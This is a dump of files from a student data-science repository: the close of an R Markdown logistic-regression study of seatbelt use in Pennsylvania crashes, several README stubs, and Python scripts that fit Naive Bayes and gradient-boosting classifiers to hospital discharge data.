\n\nFor our cross validation, we'll still take advantage of our unbiased training dataframe - trainingData_dfAge. \n\n```{r}\nlibrary(plyr) # progress bar\nlibrary(caret) # confusion matrix\n\n# False positive rate\nfpr <- NULL\n\n# False negative rate\nfnr <- NULL\n\n# Number of iterations\nk <- 250\n\n# Initialize progress bar\npbar <- create_progress_bar('text')\npbar$init(k)\n\nacc <- NULL\n\nset.seed(222)\n\nfor(i in 1:k)\n{ # Train-test splitting\n # 85% of samples -> fitting\n # 15% of samples -> testing\n smp_size <- floor(0.85 * nrow(trainingData_dfAge)) #Sample from unbiased training data frame\n index <- sample(seq_len(nrow(trainingData_dfAge)),size=smp_size)\n train_cv <- trainingData_dfAge[index, ]\n\n#fitting the model\nmodel5_cv <- glm(seatbelt_yn~., family = binomial, data = train_cv)\n\n#predicting results \n\nresults_prob_cv <- predict(model5_cv, testData_dfAge, type = \"response\") #Predict against normally distributed data\nresults_cv <- ifelse(results_prob_cv >0.5, 1,0)\n\nanswers <- testData_dfAge$seatbelt_yn\n\nmisClassificError <- mean(answers != results_cv)\n\n#Calculate hit rate\nacc[i] <- 1 -misClassificError\n\n cm <- confusionMatrix(data=results_cv, reference=answers)\n fpr[i] <- cm$table[2]/(nrow(trainingData_dfAge)-smp_size)\n fnr[i] <- cm$table[3]/(nrow(trainingData_dfAge)-smp_size)\n \n pbar$step()\n}\n\n\n# Average accuracy of the model\ncat(\"/n\", \"Average Model Accuracy: \", mean(acc), \"\\n\")\n\npar(mfcol=c(1,2))\n\n# Histogram of accuracy\nhist(acc,xlab='Accuracy',ylab='Freq',\n col='cyan',border='blue',density=30, main = 'Hit Rate \\n # of Iterations = 250')\n\n# Boxplot of accuracy\nboxplot(acc,col='cyan',border='blue',horizontal=T,xlab='Accuracy',\n main='Cross Validated Hit Rate')\n\n# Confusion matrix and plots of fpr and fnr\ncat(\"Average Model False Positive Rate: \", mean(fpr), \"\\n\")\ncat(\"Average Model False Negative Rate: \", mean(fnr))\nhist(fpr,xlab='% of FPR',ylab='Freq',main='False Positive Rate',\n col='cyan',border='blue',density=30)\nhist(fnr,xlab='% of FNR',ylab='Freq',main='False Negative Rate',\n col='cyan',border='blue',density=30)\n\n```\n\nTesting our model over 250 iterations, we see that it performs well. With a hit rate ranging from 0.632 - 0.642. \n\n### 9.Paramter Tuning of Model 4 logitMod_dfAge\n\nThe final thing we could do to try and improve our model's performance is to look at ways to improve the tuning parameters of the coefficients of our model. All models depend on coefficients as well as on one or more tuning parameters. Coefficients are estimated using training data, while the tuning parameters are chosen. Tuning parameters help to regulate the model complexity and the choice of the tuning parameter values is important because it is linked with the accuracy of the predictions returned by the model.\n\nThe glmnet package fits the variable coefficients of a generalized linear model using a penalized maximum likelihood tuning parameter. For the tuning parameter lambda, the package computes the regularization path for the elastic-net penalty over a grid of values. A second tuning parameter called the mixing percentage is denoted by alpha. This parameter takes value in [0,1] and bridges the gap between the lasso and the ridge shrinkage/parameter tuning approaches.\n\nSource: http://www.milanor.net/blog/cross-validation-for-predictive-analytics-using-r/ \nSource: https://web.stanford.edu/~hastie/glmnet/glmnet_alpha.html#log\n\nAs a final step let's do that here just to see if we can improve our prediction accuracy performance. \n```{r}\n#Create response and predictor variables\nseatbelts <- trainingData_dfAge[, \"seatbelt_yn\"]\npredictors <- trainingData_dfAge[, -match(c(\"seatbelt_yn\"), colnames(trainingData_dfAge))]\n\ntrain_cv_set <- createDataPartition(seatbelts, p = 0.8, list = FALSE)\nstr(train_cv_set)\n\nset.seed(225)\n\n#Create training and response variables\ntrain_predictors <- predictors[train_cv_set, ]\ntrain_classes <- seatbelts[train_cv_set]\ntest_predictors <- predictors[-train_cv_set, ]\ntest_classes <- seatbelts[-train_cv_set]\n \n#Set seed for reproduceability\ncv_splits <- createFolds(seatbelts, k = 5, returnTrain = TRUE)\n```\n\nNow that we have created training and response variables by partitioning the data, we'll pass these to the trainControl and train functions of glmnet and have it return us optimal values for our tuning parameters of alpha and lambda. \n```{r}\nrequire(glmnet)\nrequire(caret)\n\nset.seed(225)\n\ncv_data_train <- trainingData_dfAge[train_cv_set, ]\ncv_data_test <- trainingData_dfAge[-train_cv_set, ]\n \nglmnet_grid <- expand.grid(alpha = c(0, .1, .2, .4, .6, .8, 1),\n lambda = seq(.01, .2, length = 20))\n#The train() function requires the model formula together with the indication of the model to fit and the grid of tuning parameter values to use.\n\n#Selection the number of iterations in the k-fold cross validation for parameter tuning\nglmnet_ctrl <- trainControl(method = \"cv\", number = 10)\nglmnet_fit <- train(seatbelt_yn ~ ., data = cv_data_train,\n method = \"glmnet\",\n tuneGrid = glmnet_grid, #select grid for plotting\n trControl = glmnet_ctrl) #specify method for selecting optimal parameters\n\nglmnet_fit$bestTune\n```\n\nWe see that glmnet has selected tuning parameters of alpha = 0.2 and lambda = 0.01. We'll now plot the results of model with the selected tuning parameters. \n\n```{r}\ntrellis.par.set(caretTheme())\nplot(glmnet_fit, scales = list(x = list(log = 2)), ylim = c(0.66,0.69))\n```\n\nWe can see that even with tuning our regularization parameters with glmnent, we aren't getting much of a boost in model accuracy. At this point, we can feel that we have done an exhaustive search and tuning of coefficients at this point. \n\nLet's finally visualize some predicted probabilities using our logistic regression model. First, we'll look at the Odds Ratios for Model 4: \n OR 2.5 % 97.5 %\n(Intercept) 0.9912012 0.9525943 1.031384\nSEX 4.1058692 3.1972367 5.275747\nAgeGroup 1.9146767 1.5656536 2.342260\nInvolvement 2.9515299 2.3501866 3.708737\nHOUR_OF_DAY 3.6289618 2.9009551 4.543663\nWEATHER 3.3575356 2.1738420 5.191351\nLANE_COUNT 1.0807956 0.9821536 1.188837\nSPEED_LIMIT 2.7679192 2.5860943 2.964576\n\nTo visualize predicted probabilities, we'll create two dataframe of male and female drivers by hour of day with AgeGroup set to Early Twenties, Weather = Clear, Lane Count = 2, and speed limit and time of Day changing. We'll then pass this dataframe to the predict function, using Model 4 to provide predicted probabilities of seatbelt use. \n```{r}\n#Create dataframe of male drivers by hour of day with AgeGroup set to Early Twenties, Weather = Clear, Lane Count = 2, and speed limit and time of Day changing. \ntimes <- unique(df_Ungrouped_AgeGroup_copy$HOUR_OF_DAY)\n\nnewdata1Males <- with(df_Ungrouped_AgeGroup, data.frame(SEX = rep(-0.135602205366684, 400), #Male, Female, Female\n AgeGroup = rep(-0.096374879558376, 400) , #\"Early Twenties\" (# -0.00269010462371031 = \"Late Twenties/Early Thirties\")\n Involvement = rep(0.136536567535011 , 400), #Driver\n HOUR_OF_DAY = rep(c(-0.0740957389622387, 0.163120634868719, -0.166749933730939, \n 0.270574034635523, 0.0751090318563372, 0.131617563097761, 0.2278741654211,-0.120257601954702, -0.0437420308413535, -0.312765783194137), 40)\n # (c(0.163120634868719, 0.270574034635523, 0.131617563097761, -0.135149089564895), 100)\n , #6 AM,10AM, 2:00 PM, 11:00 PM\n WEATHER = rep(-0.0361378659281332, 400), \n LANE_COUNT =rep(-0.320806855081444, 400), #2 lanes, (0.59084686992613 - lanes 3)\n SPEED_LIMIT = rep(c(-0.686890577831362, -0.232642741921142, 0.433326886961097, 1.27261747740865), each = 100)#25, #35, #45, #55\n ))\n#Add a column of predicted probability using model 5\nnewdata1Males$Sex <- rep(\"Male\", 400)\nnewdata1Males$predProb <- predict(logitMod_dfAge, newdata1Males, type = \"response\")\nnewdata1Males$RoadSize <- rep(\"2 Lanes\", 400) #\"3 Lanes\"), each =200\nnewdata1Males$Speed <- rep(c(\"25 MPH\", \"35 MPH\" ,\"45MPH\", \"55 MPH\") , each =100) \nnewdata1Males$TimeofDay <- rep(c( 4, 6, 8, 10, 12, 14, 18, 20, 22, 0),40)\n\n#Add predicted probabilities and create cofidence confidence intervals for predicted probabilities. \nnewdata2Males <- cbind(newdata1Males, predict(logitMod_dfAge, newdata = newdata1Males, type = \"link\",\n se = TRUE))\nnewdata2Males <- within(newdata2Males, {\n PredictedProb <- plogis(fit)\n LL <- plogis(fit - (1.96 * se.fit))\n UL <- plogis(fit + (1.96 * se.fit))\n})\n\nnewdata2Males\n\n```\n\nHere, we do the same and create dataframe of female drivers by hour of day with AgeGroup set to Early Twenties, Weather = Clear, Lane Count = 2, and speed limit and time of Day changing. \n\n```{r}\n\nnewdata1Females <- with(df_Ungrouped_AgeGroup, data.frame(SEX = rep(0.193055877385024, 400), # Female\n AgeGroup = rep(-0.096374879558376, 400), #Early Twenties\n\n Involvement = rep(0.136536567535011 , 400), #Driver\n HOUR_OF_DAY = rep(c(-0.0740957389622387, 0.163120634868719, -0.166749933730939, \n 0.270574034635523, 0.0751090318563372, 0.131617563097761, 0.2278741654211,-0.120257601954702, -0.0437420308413535, -0.312765783194137), 40)\n # (c(0.163120634868719, 0.270574034635523, 0.131617563097761, -0.135149089564895), 100)\n , #6 AM,10AM, 2:00 PM, 11:00 PM\n WEATHER = rep(-0.0361378659281332, 400), \n LANE_COUNT =rep(-0.320806855081444, 400), #2 lanes, (0.59084686992613 - lanes 3)\n SPEED_LIMIT = rep(c(-0.686890577831362, -0.232642741921142, 0.433326886961097, 1.27261747740865), each = 100)#25, #35, #45, #55\n ))\n#Add a column of predicted probability using model 5\nnewdata1Females$Sex <- rep(\"Female\", 400)\nnewdata1Females$predProb <- predict(logitMod_dfAge, newdata1Females, type = \"response\")\nnewdata1Females$RoadSize <- rep(c(\"2 Lanes\"), 400) #\"3 Lanes\" \nnewdata1Females$Speed <- rep(c(\"25 MPH\", \"35 MPH\" ,\"45MPH\", \"55 MPH\") , each =100) \nnewdata1Females$TimeofDay <- rep(c( 4, 6, 8, 10, 12, 14, 18, 20, 22, 0),40)\n\n#Now we are going to create standard errors and plot confidence intervals. \n\nnewdata2females <- cbind(newdata1Females, predict(logitMod_dfAge, newdata = newdata1Females, type = \"link\",\n se = TRUE))\nnewdata2females <- within(newdata2females, {\n PredictedProb <- plogis(fit)\n LL <- plogis(fit - (1.96 * se.fit))\n UL <- plogis(fit + (1.96 * se.fit))\n})\n\nnewdata2females\n```\n\nWe'll finish by combining these two tables of predicted probabilities and then plotting them with bans around the probability line that represent the confidence intervals for the predicted probability. \n\n```{r}\n#Combine the two data frames\ntotalDf <- rbind(newdata2females, newdata2Males)\nrequire(ggplot2)\n#Plot the total dataframe\npredicted_plot <- ggplot(totalDf, aes(x=TimeofDay, y=predProb)) + geom_ribbon(aes(ymin = LL, ymax = UL, fill = Speed), alpha = 0.2)+geom_line(aes(colour = Speed), size = 1)+facet_grid(~Sex)+ylab(\"Predicted Probability\")\n\npredicted_plot\n\n#Save Plot\nggsave(\n \"ggPredicted.png\",\n predicted_plot,\n width = 5.8,\n height = 3.5,\n dpi = 300)\n```\n\nIn the above visual we can see how the predicted probability of seatbelt use for male or female drivers changes based upon time, road speed, and driver type with weather (Clear), lane count (2), and AgeGroup (early Twenties) held constant. We can see that for the same time of day and speed of the road, a female is more likely to be wearing a seatbelt. However, we can see the issues that arise with the poor sensitivity of our model. The predicted probabilities are clearly underestimating the Seatbelt Use of Yes. We can confirm this both either by performing several basic calculations on our dataframe or by comparing to findings from other literature. \n\n### Conclusions\nIn this study, we initially trained and tested a model with seven predictor variables. This model had an accuracy of 80 percent, however, upon further inspection we found that it did a poor job of predicting seatbelt non-users. We suspected that this might have been a result of the bias in our sample. To account for this we resampled training data to have as many observations of non-seatbelt use as seatbelt use. Furthermore, we translated our categorical variables into continuous numeric variables using Weight of Evidence (WOE) values. \n\nAs a result, our model's ability to accurately predict seatbelt non-use greatly improved from ~1% to > 75% with an Area Under the Receiver Operator Curve (AUROC) of approximately 0.74. However, this improvement came at the cost of overall accuracy, which decreased to ~64%. The Odds Ratios of this model points to an occupant's Sex, (4.1058692), the Hour of Day (3.6289618), Weather (3.3575356), and Speed Limit (2.7679192) as the most significant factors affecting seatbelt use. The model's performance was then confirmed using a variant of k-fold cross-validation (CV). This CV was ran 250 times and provided a range of accuracy scores from 63.2 - 64.2%. Finally, as a last step to see if we could improve the performance, we calculated regularization parameters using the glmnet package. This did not significantly boost model performance. \n\nAs currently constructed, our best model - Model 4 - allows us to output predicted probabilities of seatbelt use while holding constant or changing variables of Sex, Age Group, Involvement, Hour of the Day, Weather, Lane Count, and Speed Limit. It is important to note that the application of this model for states other than Pennsylvania is limited as primary seatbelt enforcement laws differ by state. The performance of this model might be improved by additional predictor variables. For example, several studies have identified a relationship between vehicle type and seatbelt use, specifically that seatbelt use in pickup trucks is lower than other passenger vehicles. Additionally, we did not explore the potential of weighting our response variable of Seatbelt Use = No. \n\nIn this analysis, we trained and tested 5 models using seven predictor variables. Our best model as assessed with AIC, Accuracy, AUROC, Sensitivity, and Specificity performs fairly well at predicting occupants involved crashes who were not wearing seatbelt use. Given the significance of seatbelt use as a safety measure that reduces injury severity and mortality further development of similar predictive models is merited in order to support educational and public safety campaigns. \n" }, { "alpha_fraction": 0.8360655903816223, "alphanum_fraction": 0.8360655903816223, "avg_line_length": 59, "blob_id": "1a91676bdb31dd1f1441fb23d8876a97f24a9e0a", "content_id": "b9de9ecb7cdfae00a998e697b53cc18219f2c1a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 61, "license_type": "no_license", "max_line_length": 59, "num_lines": 1, "path": "/Introduction to Data Mining/Final/Visualization/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains visualizations from the final project. \n" }, { "alpha_fraction": 0.5233297944068909, "alphanum_fraction": 0.565040647983551, "avg_line_length": 35.50967788696289, "blob_id": "2c942b5f8338c1b1c982597f6298d1d07b82c5f2", "content_id": "604d5479b2244b5f9e7bfe3ffd64010d915048d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5658, "license_type": "no_license", "max_line_length": 164, "num_lines": 155, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/ZIP_bNb_Gbc.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 12:20:54 2017\n\n@author: davidrobison\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 16).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n#\"ASOURCE\", \"ATYPE\", \"TOTCHG\", \"ZIPINC_QRTL\"\n\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary Features\n#==============================================================================\n\ndfBernouli = df[[\"ZIPINC_QRTL\", \"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\n\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\n'''Create predictor and response numpy arrays using Pandas indexing for optimal \nperformance'''\nXzipBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'ZIPINC_QRTL'])\nyZipBnb = np.array(dfBernouli.loc[:,\"ZIPINC_QRTL\"])\n\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XzipBnb, yZipBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of ZIPINC_QRTL\")\n\n#Begin Pipeline Setup\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[20,25,30])\n\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_micro\", n_jobs=-1)\n\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\nBnbPreds = gsBnb.predict(X_testBnb)\n\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, y_testBnb)\nBnbMatrix = confusion_matrix(BnbPreds, y_testBnb)\n\nbestModelBnb = gsBnb.best_estimator_\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'ZIP_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n#If I did a feature selection, I believe that the feature removal due to Bnb would have\n# higher feature importances. Will need to return. \n# precision recall f1-score support\n# \n# 1 0.35 0.33 0.34 9042\n# 2 0.00 0.11 0.00 18\n# 3 0.01 0.31 0.02 282\n# 4 0.78 0.36 0.49 23658\n# \n# avg / total 0.65 0.35 0.45 33000\n# \n# \n# Accuracy Score: 0.352212121212\n#==============================================================================\n\n\n#==============================================================================\n# Gradient Boosting Classifier without Re-sampling\n#==============================================================================\n\nXzipGb = np.array(df.loc[:, df.columns != 'ZIPINC_QRTL'])\nyZipGb = np.array(df.loc[:,\"ZIPINC_QRTL\"])\n\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n\nlearningRate = [0.2]\nminSamples = [5,10]\n\nparamGridGbc = [{\n \"clf__min_samples_split\":minSamples,\n \"clf__learning_rate\":learningRate}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XzipGb, yZipGb, test_size=0.33, random_state=43)\n\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\n\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'ZIP_GbBestModel.pkl', compress = 9)\n\n#==============================================================================\n# best_params: {'clf__learning_rate': 0.2, 'clf__min_samples_split': 10}\n# precision recall f1-score support\n# \n# 1 0.64 0.70 0.67 8394\n# 2 0.49 0.40 0.44 5833\n# 3 0.48 0.39 0.43 7627\n# 4 0.69 0.79 0.74 11146\n# \n# avg / total 0.59 0.61 0.60 33000\n# \n# Accuracy Score: 0.606393939394\n#==============================================================================\n\n#==============================================================================\n# Gradient Boosting Classifier with Over and Under Resampling\n#==============================================================================\n\n\n\npipelr.fit(X_train, y_train)\n\nprint(\"test accuracy: %.3f\" %pipelr.score(X_test, y_test))\n\n\n\nn" }, { "alpha_fraction": 0.797468364238739, "alphanum_fraction": 0.797468364238739, "avg_line_length": 78, "blob_id": "ac35ae4c503d831244437e4353ee9945996bd833", "content_id": "60d68950266368c36da7bfa5a2c3b7b5a5dbb4af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 78, "num_lines": 1, "path": "/Machine Learning I/Final/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains code, a report, and a presentation for the final project.\n" }, { "alpha_fraction": 0.8110598921775818, "alphanum_fraction": 0.8110598921775818, "avg_line_length": 215, "blob_id": "144f4afdad9d97fee42ed02df09064bfb13bebf3", "content_id": "5fde1b662ce1120a2de28a56c3f9987af2f90c8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 217, "license_type": "no_license", "max_line_length": 215, "num_lines": 1, "path": "/Introduction to Data Mining/Final/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "This folder contains code and presentation from final project work for this course, which used data from the Centers for Medicare and Medicaid Services (CMS) and the Centers for Disease Prevention and Control (CDC).\n\n" }, { "alpha_fraction": 0.8061224222183228, "alphanum_fraction": 0.8061224222183228, "avg_line_length": 96, "blob_id": "ed7564a44e3df8ff3a248adee925b91063ffa82f", "content_id": "041bf4c84c022336de0490f46b40b67d69217c4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 98, "license_type": "no_license", "max_line_length": 96, "num_lines": 1, "path": "/Machine Learning I/Midterm/Code/RandomForest/README.md", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "Ipython notebooks for random forest analysis of varibles in this project. Primary author Nathan Zencey. \n" }, { "alpha_fraction": 0.5064523816108704, "alphanum_fraction": 0.5590214729309082, "avg_line_length": 39.222930908203125, "blob_id": "6c98eaf4d77ec456292ab1e78633299fa06d8457", "content_id": "49265357037a74f81a8ad8012a12b6aec68e9230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12631, "license_type": "no_license", "max_line_length": 164, "num_lines": 314, "path": "/Machine Learning I/Midterm/Code/BernoulNB_GradientBoostedTrees/Race_bNb_Gbt.py", "repo_name": "robi86/Masters-Project-Work", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 10:22:25 2017\n\n@author: davidrobison\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport random \nimport matplotlib.pyplot as plt\nfrom collections import Counter\nfrom sklearn.externals import joblib\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import classification_report, accuracy_score, confusion_matrix, f1_score\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, cross_val_score, train_test_split\nfrom sklearn.pipeline import Pipeline\n\n\n#Read in dataframe, randomly sampling 100,000 values and dropping \n#HOSPID, KEY, and NISSTRATUM which are noisey variables\ndf = pd.read_csv(\"data_train.csv\").dropna(1, thresh= 445000).dropna(0, how=\"any\").sample(n=100000, random_state = 12).drop([\"HOSPID\", \"KEY\", \"NIS_STRATUM\"], axis=1)\n\n#==============================================================================\n# Bernouli Naive Bayes Classifier as Baseline with Binary Features\n#==============================================================================\n\n#Select binary features from df\ndfBernouli = df[[\"RACE\", \"AWEEKEND\", \"DIED\",\"FEMALE\", \"ORPROC\", 'CM_AIDS', 'CM_ALCOHOL', 'CM_ANEMDEF',\n 'CM_ARTH', 'CM_BLDLOSS', 'CM_CHF', 'CM_CHRNLUNG', 'CM_COAG',\n 'CM_DEPRESS', 'CM_DM', 'CM_DMCX', 'CM_DRUG', 'CM_HTN_C', 'CM_HYPOTHY',\n 'CM_LIVER', 'CM_LYMPH', 'CM_LYTES', 'CM_METS', 'CM_NEURO', 'CM_OBESE',\n 'CM_PARA', 'CM_PERIVASC', 'CM_PSYCH', 'CM_PULMCIRC', 'CM_RENLFAIL',\n 'CM_TUMOR', 'CM_ULCER', 'CM_VALVE', 'CM_WGHTLOSS']]\n\n#Convert non-numeric columns to type int\ntoInt = [\"AWEEKEND\", \"DIED\",\"FEMALE\"]\nfor col in toInt:\n dfBernouli.loc[:, col] = dfBernouli.loc[:, col].astype(int)\n\n\nXraceBnb = np.array(dfBernouli.loc[:, dfBernouli.columns != 'RACE'])\nyRaceBnb = np.array(dfBernouli.loc[:,\"RACE\"])\n\n#Train test split\nX_trainBnb, X_testBnb, y_trainBnb, y_testBnb = train_test_split(XraceBnb, yRaceBnb, test_size=0.33, random_state=42)\n\n#Look at distribution to see class imbalance and print out class\n#imbalance with Counter\nc = Counter(y_trainBnb)\nprint('Original dataset shape {}'.format(Counter(y_trainBnb)))\nprint([(i, c[i] / len(y_trainBnb) * 100.0) for i, count in c.most_common()])\nplt.hist(y_trainBnb)\nplt.title(\"Multiclass Distribution of Race\")\n\n#Begin Pipeline Setup with a step for univariate feature selection\nselect = SelectKBest()\nbNb = BernoulliNB()\nsteps = [(\"feature_selection\", select), (\"bernouli_nb\", bNb)]\npipeNb = Pipeline(steps)\n\nparaGridBnb = dict(feature_selection__k=[30,31,32,33])\n\n#Run 3-fold Cross Validated GridSearch\ngsBnb = GridSearchCV(pipeNb, param_grid=paraGridBnb, scoring=\"f1_macro\", n_jobs=-1)\ngsBnb.fit(X_trainBnb, y_trainBnb)\n\n#Predict using fitted bNb model and print classification report and accuracy score\nBnbPreds = gsBnb.predict(X_testBnb)\nBnbReport = classification_report(BnbPreds, y_testBnb)\nBnbScore = accuracy_score(BnbPreds, y_testBnb)\nprint(BnbReport)\nprint(BnbScore)\n\n#Save Model\nbestModelBnb = gsBnb.best_estimator_\njoblib.dump(bestModelBnb, 'Race_BnbBestModel.pkl', compress = 9)\n\n#==============================================================================\n#Best Parameters {'feature_selection__k': 32}\n\n# precision recall f1-score support\n#\n# 1 1.00 0.69 0.82 32823\n# 2 0.02 0.55 0.03 177\n# 3 0.00 0.00 0.00 0\n# 4 0.00 0.00 0.00 0\n# 5 0.00 0.00 0.00 0\n# 6 0.00 0.00 0.00 0\n#\n# avg / total 0.99 0.69 0.81 33000\n\n# Accuracy Score 0.690545454545\n#==============================================================================\n\n\n#==============================================================================\n# Gradient Boosted Trees Classifier without Re-sampling\n#==============================================================================\n\n#Create new X and y arrays for train test split\nXraceGb = np.array(df.loc[:, df.columns != 'RACE'])\nyRaceGb = np.array(df.loc[:,\"RACE\"])\n\n#Initiate pipeline and paramGrid to pass to Gridserach\npipeGbc = Pipeline([\n (\"clf\", GradientBoostingClassifier())])\n \nlearning = [0.2]\nsamplesSplit = [7,20]\nparamGridGbc = [{\n \"clf__min_samples_split\":samplesSplit,\n \"clf__learning_rate\":learning}]\n \ngsGbc = GridSearchCV(estimator=pipeGbc, param_grid = paramGridGbc,\n scoring = \"f1_micro\", cv = 3, n_jobs = -1)\n\n#Train test split\nX_trainGb, X_testGb, y_trainGb, y_testGb = train_test_split(XraceGb, yRaceGb, test_size=0.33, random_state=43)\n\n#Fit grid search\ngsGbc.fit(X_trainGb, y_trainGb)\n\ngbcPreds = gsGbc.predict(X_testGb)\nprint(classification_report(y_testGb, gbcPreds))\nprint(accuracy_score(y_testGb, gbcPreds))\n\nbestModelGb = gsGbc.best_estimator_\n\n#Save best model and review precision,recall, and f1-score\nfrom sklearn.externals import joblib\njoblib.dump(bestModelGb, 'Race_GBModel.pkl', compress = 9)\n#==============================================================================\n# Best Parameters:{'clf__learning_rate': 0.2, 'clf__min_samples_split': 7}\n# precision recall f1-score support\n# \n# 1 0.82 0.95 0.88 22746\n# 2 0.57 0.46 0.51 5802\n# 3 0.54 0.33 0.41 2688\n# 4 0.00 0.00 0.00 430\n# 5 0.03 0.02 0.03 42\n# 6 0.82 0.20 0.33 1292\n# \n# avg / total 0.74 0.77 0.74 33000\n# \n# 0.768363636364\n#==============================================================================\n\n#BELOW ARE STEPS THAT WERE TAKEN TO VALIDATE THE BEST PARAMETERS FOR A \n#BEST ESTIMATOR. VALIDATION CURVES WERE PRODUCED AND ARE AVAILABLE IN SUPPLEMENTARY\n#FILES FOLDER\n\n#==============================================================================\n# Gradient Boosted Validation Curve min_samples_split\n#==============================================================================\n\nfrom sklearn.model_selection import validation_curve\n\nparam_range = [3,10, 20,40]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__min_samples_split\",\n param_range = param_range,\n cv = 5)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nimport matplotlib.pyplot as plt\nfig1 = plt.figure()\nplt.plot(param_range, train_mean, color='blue', marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n train_mean - train_std, alpha=0.15,\n color='blue')\nplt.plot(param_range, test_mean, color='green', linestyle='--',\n marker='s', markersize=5,\n label='validation accuracy')\nplt.fill_between(param_range, test_mean + test_std,\n test_mean - test_std,\n alpha=0.15, color='green')\nplt.grid()\nplt.legend(loc='center right')\nplt.xlabel('Min Samples Split')\nplt.ylabel('Accuracy')\nplt.show()\nfig1.savefig(\"Race_min_samples\", dpi = 300)\n# test_mean: array([ 3: 0.76629874, 10: 0.76592558, 20: 0.7669256 , 40: 0.76664203])\n\n#==============================================================================\n# Gradient Boosted Validation Curve max_depth\n#==============================================================================\n\nparam_range = [3, 7]\ntrain_scores, test_scores = validation_curve(estimator= pipelr,\n X= X_train,\n y = y_train,\n param_name= \"clf__max_depth\",\n param_range = param_range,\n cv = 3)\n\ntrain_mean = np.mean(train_scores, axis=1)\ntrain_std = np.std(train_scores, axis=1)\ntest_mean = np.mean(test_scores, axis=1)\ntest_std = np.std(test_scores, axis=1)\n\nfig2 = plt.figure()\nimport matplotlib.pyplot as plt\nplt.plot(param_range, train_mean, color='blue', marker='o', markersize=5,\n label='training accuracy')\nplt.fill_between(param_range, train_mean + train_std,\n 